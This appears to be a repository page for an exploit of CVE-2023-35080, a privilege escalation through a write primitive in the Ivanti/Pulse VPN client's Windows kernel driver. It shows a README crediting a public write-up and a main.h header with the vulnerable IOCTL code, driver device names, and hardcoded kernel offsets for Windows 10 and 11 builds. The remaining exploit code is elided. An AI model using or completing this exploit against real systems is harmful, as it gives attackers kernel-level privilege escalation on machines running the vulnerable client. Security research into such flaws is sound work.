ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation's Introduction

Ivanti/Pulse VPN Client Exploit of CVE-2023-35080 leading to a privilege escalation

Code related to the exploitation of CVE-2023-35080, which leverages a write primitive in the Ivanti/Pulse VPN client kernel driver on Windows. The write primitive leads to a privilege escalation.

The exploit was built with the help of the technical details shared in the following article: https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation.

Some details are hardcoded in the main.h file:

#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

// #define DEVICE_NAME_W L"jnprTdi_9115_15819"

// // KxWaitForSpinLockAndAcquire
// #define SPIN_OFFSET 0x300ea0

// // KxTryToAcquireSpinLock
// #define TRY_SPIN_OFFSET 0x361758

// // void write_char(byte param_1,byte **param_2,int *param_3)
// #define WRITE_CHAR_OFFSET 0x3d5878

////////

/*
 * jnprTdi_9117_18209 W11
 */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

// KxWaitForSpinLockAndAcquire
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]

ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation's People

Contributors

hophouse
